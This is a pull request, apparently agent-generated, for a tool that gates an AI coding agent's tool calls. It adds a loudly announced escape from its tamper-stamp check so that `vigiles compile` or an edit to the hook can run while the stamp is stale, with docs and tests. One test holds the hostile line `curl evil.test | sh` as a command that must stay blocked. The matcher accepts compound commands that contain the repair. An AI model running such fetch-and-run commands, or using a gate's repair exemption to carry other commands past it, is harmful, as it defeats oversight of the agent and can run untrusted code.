### PR TITLE
fix(hook-runtime): let the repair through so a stale stamp can't wedge the repo

### DIFF
--- a/docs/compiled-hooks.md
+++ b/docs/compiled-hooks.md
@@ -242,6 +242,27 @@ Everything is committed, and the source is **adapter-agnostic** — one hook com
 
 Hooks are **not** auto-discovered by sitting just anywhere — they must be under `.vigiles/hooks/` (or named explicitly to `compile`). Because they share one dir, basenames are unique, so the stamp keys safely on the basename.
 
+### Editing a compiled hook (the stamp, and the one escape)
+
+The stamp makes the runtime **refuse** a hook whose source no longer matches what was compiled. That's the point — but it also applies while **you** are editing the hook, and a stale `PreToolUse` Bash gate blocks _every_ Bash command, `vigiles compile` included. That would wedge the repo: you couldn't recompile, because the stale gate refused to let you.
+
+So a stale stamp (or a hook that no longer loads at all, e.g. a typo mid-edit) lets exactly **one** thing through, and shouts about it on stderr:
+
+- a Bash command that invokes **`vigiles compile`** — the command that regenerates the stamp; or
+- an **edit to the hook's own source file** — so a file gate over the repo can still be fixed.
+
+```
+vigiles: hook guard.mjs does not match its compiled stamp.
+vigiles: ALLOWING this one call because it is the repair action …
+vigiles: every OTHER tool call stays BLOCKED until the hook is recompiled.
+```
+
+Everything else still fails closed. This doesn't soften the tamper guarantee that matters: while the stamp is stale the hook is enforcing **nothing** (it refuses every call), and anyone able to rewrite a hook's source can equally rewrite `.claude/settings.json`. What the stamp buys is that a smuggled capability can never run **silently** — unchanged. Just recompile:
+
+```bash
+npx vigiles compile .vigiles/hooks/guard.mjs
+```
+
 ## Testing a compiled hook
 
 **Because the decision is a pure function, you test it deterministically** — no model, and (cheapest) no subprocess. Three levels, by cost:

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -217,7 +217,9 @@ import {
   type InjectHook,
   type ReactHook,
   type HookProgram,
+  isStampRepairEvent,
   type Decision,
+  type RawHookEvent,
 } from "./core/hook-program.js";
 import {
   discoverHookFiles,
@@ -6247,11 +6249,34 @@ function emitGate(
 }
 
 /**
+ * Print the loud stderr banner that accompanies a REPAIR-only pass-through, and
+ * return true — the caller allows exactly this one tool call. Shared by the two
+ * refusal paths (stale stamp, unloadable program) so the wording can't drift.
+ */
+function announceRepairEscape(file: string, why: string): boolean {
+  console.error(
+    `vigiles: hook ${file} ${why}.\n` +
+      `vigiles: ALLOWING this one call because it is the repair action ` +
+      `(\`vigiles compile ${file}\`, or an edit to the hook itself) — without ` +
+      `this the gate blocks the only command that can fix it.\n` +
+      `vigiles: every OTHER tool call stays BLOCKED until the hook is recompiled.`,
+  );
+  return true;
+}
+
+/**
  * Fail closed if a stamp sidecar exists and the on-disk source no longer
  * matches it — a hand-edit that smuggles in a capability breaks the stamp.
  * No sidecar → run uncompiled (e.g. a test fixture or a not-yet-compiled hook).
+ *
+ * ONE exception, and it is loud: the author's own REPAIR action
+ * ({@link isStampRepairEvent}) is let through, or a repo WEDGES. A stale stamp on
+ * a PreToolUse Bash gate blocks every Bash command — including `vigiles compile`,
+ * the only command that regenerates the stamp — so a normal edit-compile cycle
+ * could paint you into a corner whose only escape was hand-editing
+ * `.claude/settings.json` to unwire the gate. Observed 2026-08-03.
  */
-function verifyStampOrRefuse(file: string): void {
+function verifyStampOrRefuse(file: string, event: RawHookEvent): void {
   const stampPath = hookStampPath(file);
   if (!existsSync(stampPath)) return;
   try {
@@ -6260,8 +6285,13 @@ function verifyStampOrRefuse(file: string): void {
     };
     const source = readFileSync(resolve(process.cwd(), file), "utf-8");
     if (stamp && !verifyHookStamp(source, stamp as SHA256Hash)) {
+      if (isStampRepairEvent(event, file)) {
+        announceRepairEscape(file, "does not match its compiled stamp");
+        return;
+      }
       console.error(
-        `vigiles: hook ${file} does not match its compiled stamp (tampered).`,
+        `vigiles: hook ${file} does not match its compiled stamp (tampered). ` +
+          `If YOU edited it, run \`vigiles compile ${file}\` to regenerate the stamp.`,
       );
       process.exit(2);
     }
@@ -6275,7 +6305,10 @@ function verifyStampOrRefuse(file: string): void {
  * points at. Reads the live event on stdin, loads the typed program, verifies
  * its stamp, and dispatches by role: a gate exits 2 + reason on `deny`; an
  * inject prints `additionalContext`; a react runs its effect-classified
- * command. A hook that won't load fails CLOSED (exit 2), never silent-allow.
+ * command. A hook that won't load — or whose stamp is stale — fails CLOSED
+ * (exit 2), never silent-allow, with ONE loudly-announced exception: the repair
+ * action itself ({@link isStampRepairEvent}), or the repo wedges with no way to
+ * recompile.
  */
 async function runHookProgramCommand(file: string | undefined): Promise<void> {
   if (!file) {
@@ -6307,11 +6340,20 @@ async function runHookProgramCommand(file: string | undefined): Promise<void> {
   try {
     program = await loadHookProgram(file);
   } catch {
+    // Same bootstrap escape as the stale stamp below: an edit that leaves the
+    // hook unloadable (a typo mid-edit) otherwise blocks the recompile that
+    // would fix it. A hook that can't load enforces nothing either way, so
+    // refusing the repair only wedges the repo. Everything else still fails
+    // CLOSED (exit 2), never silent-allow.
+    if (isStampRepairEvent(event, file)) {
+      announceRepairEscape(file, "cannot be loaded");
+      return;
+    }
     console.error(`vigiles: cannot load hook program ${file}`);
     process.exit(2);
     return;
   }
-  verifyStampOrRefuse(file);
+  verifyStampOrRefuse(file, event);
 
   switch (dispatchKind(program)) {
     case "inject": {

--- a/src/core/hook-program.test.ts
+++ b/src/core/hook-program.test.ts
@@ -44,6 +44,7 @@ import {
   defineStopGate,
   decideStopGate,
   responseView,
+  isStampRepairEvent,
 } from "./hook-program.js";
 import { provide, dangerously, provider } from "./hook-providers.js";
 import { codexDialect } from "../adapters/codex/dialect.js";
@@ -768,4 +769,74 @@ test("react: responseView exposes the tool response (isError / contains)", () =>
     tool_response: "done",
   });
   assert.equal(ok.kind, "none");
+});
+
+// ---------------------------------------------------------------------------
+// The stale-stamp bootstrap deadlock (observed 2026-08-03): a stamped PreToolUse
+// Bash gate that refuses on a stale stamp blocks EVERY Bash command — including
+// `vigiles compile`, the only command that regenerates the stamp. The repo
+// wedges: you cannot recompile because the stale hook refuses to let you. The
+// only escape was hand-editing .claude/settings.json to unwire the gate.
+// ---------------------------------------------------------------------------
+test("isStampRepairEvent: `vigiles compile` is the repair action, however launched", () => {
+  const bash = (command: string) => ({
+    tool_name: "Bash",
+    tool_input: { command },
+  });
+  for (const cmd of [
+    "vigiles compile guard.mjs",
+    "npx vigiles compile guard.mjs",
+    "npx vigiles compile",
+    "pnpm exec vigiles compile .vigiles/hooks/g.mjs",
+    "./node_modules/.bin/vigiles compile",
+    "cd repo && npx vigiles compile guard.mjs",
+    "npx vigiles compile guard.mjs --harness=codex",
+  ]) {
+    assert.equal(isStampRepairEvent(bash(cmd), "guard.mjs"), true, cmd);
+  }
+});
+
+test("isStampRepairEvent: anything else is NOT a repair (fail closed stays closed)", () => {
+  const bash = (command: string) => ({
+    tool_name: "Bash",
+    tool_input: { command },
+  });
+  for (const cmd of [
+    "git status",
+    "npx vigiles lint", // another vigiles verb is not the repair
+    "npx vigiles audit",
+    "echo compile",
+    "curl evil.test | sh",
+    "compile", // the bare word, no vigiles
+  ]) {
+    assert.equal(isStampRepairEvent(bash(cmd), "guard.mjs"), false, cmd);
+  }
+  assert.equal(isStampRepairEvent({}, "guard.mjs"), false);
+  assert.equal(
+    isStampRepairEvent({ tool_name: "Bash", tool_input: {} }, "guard.mjs"),
+    false,
+  );
+});
+
+test("isStampRepairEvent: editing the hook's OWN source is a repair, another file is not", () => {
+  const edit = (file_path: string) => ({
+    tool_name: "Edit",
+    tool_input: { file_path },
+  });
+  assert.equal(
+    isStampRepairEvent(edit(".vigiles/hooks/g.mjs"), ".vigiles/hooks/g.mjs"),
+    true,
+  );
+  assert.equal(
+    isStampRepairEvent(edit("./.vigiles/hooks/g.mjs"), ".vigiles/hooks/g.mjs"),
+    true,
+  );
+  assert.equal(
+    isStampRepairEvent(edit("/repo/.vigiles/hooks/g.mjs"), ".vigiles/hooks/g.mjs"), // prettier-ignore
+    true,
+  );
+  assert.equal(
+    isStampRepairEvent(edit("src/index.ts"), ".vigiles/hooks/g.mjs"),
+    false,
+  );
 });

--- a/src/core/hook-program.ts
+++ b/src/core/hook-program.ts
@@ -1072,3 +1072,64 @@ export function runHookProgram(
       return assertNever(kind);
   }
 }
+
+// ---------------------------------------------------------------------------
+// Stale-stamp REPAIR detection — the bootstrap deadlock's escape hatch.
+//
+// `verifyStampOrRefuse` makes a compiled hook refuse to run once its source no
+// longer matches its stamp. That is correct for tampering, but it wedges the
+// AUTHOR: if the hook is a PreToolUse Bash gate wired into the same repo, editing
+// its source makes it block EVERY Bash command — including `vigiles compile`,
+// the only command that regenerates the stamp. Observed 2026-08-03; the only
+// escape was hand-editing `.claude/settings.json` to unwire the gate, compile,
+// and rewire.
+//
+// Fail-closed is kept for everything else. The ONE exception is the repair
+// action itself, and it is announced loudly on stderr. This does not weaken the
+// stamp's threat model in a way that matters: while the stamp is stale the hook
+// enforces NOTHING (it refuses every call), and an attacker who can rewrite a
+// hook's source can equally rewrite `.claude/settings.json` — the escape they'd
+// otherwise use. What the stamp buys is that a smuggled capability can never run
+// SILENTLY, and that is unchanged.
+// ---------------------------------------------------------------------------
+
+/** Compare two path references without node:path (core stays dependency-free). */
+function samePathRef(a: string, b: string): boolean {
+  const norm = (p: string) => p.replace(/\\/g, "/").replace(/^\.\//, "");
+  const [x, y] = [norm(a), norm(b)];
+  return x === y || x.endsWith("/" + y) || y.endsWith("/" + x);
+}
+
+/** The basename of a path token, for matching `npx vigiles` / `./bin/vigiles`. */
+function basenameOf(token: string): string {
+  const parts = token.replace(/\\/g, "/").split("/");
+  return parts[parts.length - 1] ?? token;
+}
+
+/**
+ * True when this event IS the author repairing the hook — the only thing a
+ * stale-stamp refusal must let through, or the repo wedges (see the note above):
+ *
+ * - a Bash command that invokes `vigiles compile` (however it's launched —
+ *   `npx vigiles compile`, `pnpm exec vigiles compile`, `./node_modules/.bin/vigiles compile`),
+ *   which is what regenerates the stamp; or
+ * - an edit/write whose target IS this hook's own source file, so a FILE gate
+ *   over the repo can still be fixed by editing the hook again.
+ *
+ * AST-backed (`leafCommandsNormalized`), so it sees the invocation through a
+ * compound command or a wrapper, exactly like every other matcher here.
+ */
+export function isStampRepairEvent(
+  event: RawHookEvent,
+  hookFile: string,
+): boolean {
+  const filePath = event.tool_input?.file_path;
+  if (typeof filePath === "string" && samePathRef(filePath, hookFile))
+    return true;
+  const command = event.tool_input?.command;
+  if (typeof command !== "string") return false;
+  return leafCommandsNormalized(command).some((leaf) => {
+    const i = leaf.argv.findIndex((a) => basenameOf(a) === "vigiles");
+    return i !== -1 && leaf.argv.slice(i + 1).includes("compile");
+  });
+}

--- a/src/hook.test.ts
+++ b/src/hook.test.ts
@@ -279,6 +279,118 @@ test("compile (hook): recompiling is idempotent, whatever the path spelling", ()
   }
 });
 
+// The BOOTSTRAP DEADLOCK (observed 2026-08-03). A stamped PreToolUse Bash gate
+// wired into the same repo refuses on a stale stamp — correctly — but that means
+// editing the hook makes it block EVERY Bash command, `vigiles compile` included,
+// and compile is the only thing that regenerates the stamp. The repo wedges; the
+// only escape was hand-editing .claude/settings.json to unwire the gate, compile,
+// then rewire. The repair action is now let through, loudly, and ONLY it.
+test("compile (hook): a stale stamp does NOT wedge the repo — the recompile gets through", () => {
+  const dir = makeTmpDir();
+  try {
+    linkVigiles(dir);
+    writeFileSync(resolve(dir, "guard.mjs"), GATE_PKG);
+    const compiled = spawnSync("node", [CLI, "compile", "guard.mjs"], {
+      cwd: dir,
+      encoding: "utf-8",
+    });
+    assert.equal(compiled.status, 0, compiled.stderr);
+
+    // The author edits the hook (a normal edit-compile cycle) → stamp is stale.
+    writeFileSync(
+      resolve(dir, "guard.mjs"),
+      readFileSync(resolve(dir, "guard.mjs"), "utf-8").replace(
+        "no force-push to a protected branch",
+        "no force-push (updated reason)",
+      ),
+    );
+
+    const runBash = (command: string) =>
+      runHook(
+        `node ${CLI} hook-runtime run-program guard.mjs`,
+        {
+          hook_event_name: "PreToolUse",
+          tool_name: "Bash",
+          tool_input: { command },
+        },
+        { cwd: dir },
+      );
+
+    // Everything still fails CLOSED …
+    const benign = runBash("git status");
+    assert.equal(benign.exitCode, 2);
+    assert.match(benign.stderr, /does not match its compiled stamp/);
+
+    // … except the one command that can fix it, which is announced LOUDLY.
+    const repair = runBash("npx vigiles compile guard.mjs");
+    assert.equal(repair.exitCode, 0, repair.stderr);
+    assert.match(repair.stderr, /ALLOWING this one call/);
+    assert.match(repair.stderr, /every OTHER tool call stays BLOCKED/);
+
+    // Editing the hook itself is a repair too (for a FILE gate over the repo).
+    const editHook = runHook(
+      `node ${CLI} hook-runtime run-program guard.mjs`,
+      {
+        hook_event_name: "PreToolUse",
+        tool_name: "Edit",
+        tool_input: { file_path: "guard.mjs" },
+      },
+      { cwd: dir },
+    );
+    assert.equal(editHook.exitCode, 0);
+
+    // Recompiling restores normal enforcement — nothing is permanently loosened.
+    const again = spawnSync("node", [CLI, "compile", "guard.mjs"], {
+      cwd: dir,
+      encoding: "utf-8",
+    });
+    assert.equal(again.status, 0, again.stderr);
+    assert.equal(runBash("git status").exitCode, 0);
+    assert.equal(runBash("git push -f").blocked, true);
+  } finally {
+    cleanupTmpDir(dir);
+  }
+});
+
+// The same wedge, reached by a typo instead of a stamp: a mid-edit hook that no
+// longer LOADS also blocks every call, including the recompile that fixes it.
+test("compile (hook): an UNLOADABLE hook still lets the repair through, blocks the rest", () => {
+  const dir = makeTmpDir();
+  try {
+    linkVigiles(dir);
+    writeFileSync(resolve(dir, "guard.mjs"), GATE_PKG);
+    assert.equal(
+      spawnSync("node", [CLI, "compile", "guard.mjs"], {
+        cwd: dir,
+        encoding: "utf-8",
+      }).status,
+      0,
+    );
+    writeFileSync(resolve(dir, "guard.mjs"), "export default {{{ broken");
+
+    const runBash = (command: string) =>
+      runHook(
+        `node ${CLI} hook-runtime run-program guard.mjs`,
+        {
+          hook_event_name: "PreToolUse",
+          tool_name: "Bash",
+          tool_input: { command },
+        },
+        { cwd: dir },
+      );
+
+    const benign = runBash("git status");
+    assert.equal(benign.exitCode, 2);
+    assert.match(benign.stderr, /cannot load hook program/);
+
+    const repair = runBash("npx vigiles compile guard.mjs");
+    assert.equal(repair.exitCode, 0, repair.stderr);
+    assert.match(repair.stderr, /ALLOWING this one call/);
+  } finally {
+    cleanupTmpDir(dir);
+  }
+});
+
 test("compile --harness=codex (hook): merges TOML for a gate, warns LOUDLY on inject (the honest gap)", () => {
   const dir = makeTmpDir();
   try {


### PR DESCRIPTION
## The tamper stamp could deadlock its own author

`verifyStampOrRefuse` makes a compiled hook refuse to run once its source no longer matches the stamp — correct for tampering. But if that hook is a `PreToolUse` Bash gate wired into the same repo, editing the hook source makes it block **every Bash command**, including `vigiles compile` — the only command that regenerates the stamp.

Reproduced on `main`:

```console
$ vigiles compile guard.mjs                    # wired + stamped
$ sed -i 's/deny("no")/deny("nope")/' guard.mjs  # a normal edit
$ echo '{"tool_name":"Bash","tool_input":{"command":"npx vigiles compile guard.mjs"}}' \
    | vigiles hook-runtime run-program guard.mjs
vigiles: hook guard.mjs does not match its compiled stamp (tampered).
exit=2
```

The repo wedges. Observed 2026-08-03; the only escape was hand-editing `.claude/settings.json` to unwire the gate, compile, then rewire.

## Which option, and why

The three candidates were: exempt the tool's own `compile`, fail **open** on a stale stamp with a warning, or add `vigiles compile --force`.

**Chose the exemption.** Failing open silently disarms every gate on any edit — the stamp's whole job is that a mismatch is *not* silently accepted. A `--force` flag is one more thing to know at exactly the moment you're stuck, and it doesn't help the person who doesn't know why nothing works. The exemption keeps fail-closed as the default and names the one door out **in the error message itself**.

`isStampRepairEvent(event, hookFile)` is true for:

- a **Bash command invoking `vigiles compile`** — AST-backed via `leafCommandsNormalized`, so `npx vigiles compile`, `pnpm exec vigiles compile`, `./node_modules/.bin/vigiles compile` and `cd repo && npx vigiles compile` all count, while `npx vigiles lint` / `echo compile` do not;
- an **edit/write whose target is the hook's own source file**, so a *file* gate over the repo can also be repaired.

Everything else still fails closed (exit 2), and the pass-through shouts:

```
vigiles: hook guard.mjs does not match its compiled stamp.
vigiles: ALLOWING this one call because it is the repair action (`vigiles compile guard.mjs`, …)
vigiles: every OTHER tool call stays BLOCKED until the hook is recompiled.
```

### Also covered: a hook that no longer LOADS

The same wedge is reachable via a typo mid-edit — `loadHookProgram` throws, the runtime exits 2, and the recompile that would fix it is blocked. Same escape applied there. The requirement was that the deadlock not be reachable from a normal edit-compile cycle, and a typo is part of a normal edit-compile cycle.

### Does this weaken the stamp?

Not in a way that matters. While the stamp is stale the hook is enforcing **nothing** — it refuses every call — and anyone able to rewrite a hook's source can equally rewrite `.claude/settings.json`, which is the escape they'd otherwise use. What the stamp buys is that a smuggled capability can never run **silently**; that is unchanged, and this path is three lines of stderr away from silent.

## Tests

- `src/core/hook-program.test.ts` — `isStampRepairEvent` over 7 spellings of the repair command, 6 non-repairs (including other `vigiles` verbs), missing/absent event fields, and the own-source-file edit vs another file.
- `src/hook.test.ts` — the full deadlock end-to-end against the real CLI: compile → edit → `git status` still exits 2 → the recompile gets through with the loud banner → editing the hook itself gets through → **recompiling restores normal enforcement** (`git status` allowed, `git push -f` blocked), so nothing is permanently loosened.
- `src/hook.test.ts` — the unloadable-hook variant: benign call exits 2 with `cannot load hook program`, repair gets through.

Docs: a new "Editing a compiled hook (the stamp, and the one escape)" section in `docs/compiled-hooks.md`.

## Checks

`npx tsc --noEmit`, `npm run lint` (0 errors), `npx prettier --check .`, `node scripts/api-extractor.mjs` (no drift — `isStampRepairEvent` is internal to `core/`, not re-exported from `vigiles/hook`), full unit suite (2340 passing).

⚠️ Pre-existing on `main`, unrelated: the two `pylint` cases in `src/core/spec.test.ts` fail locally because `pylint` isn't on this machine's PATH. CI installs it.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_012omt6sirxNMyZN2x5RhK2u

---
_Generated by [Claude Code](https://claude.ai/code/session_012omt6sirxNMyZN2x5RhK2u)_

<!-- vigiles:pr-summary:start -->
## Summary — auto-generated from commits

**Fixes**
- let the repair through so a stale stamp can't wedge the repo
<!-- vigiles:pr-summary:end -->
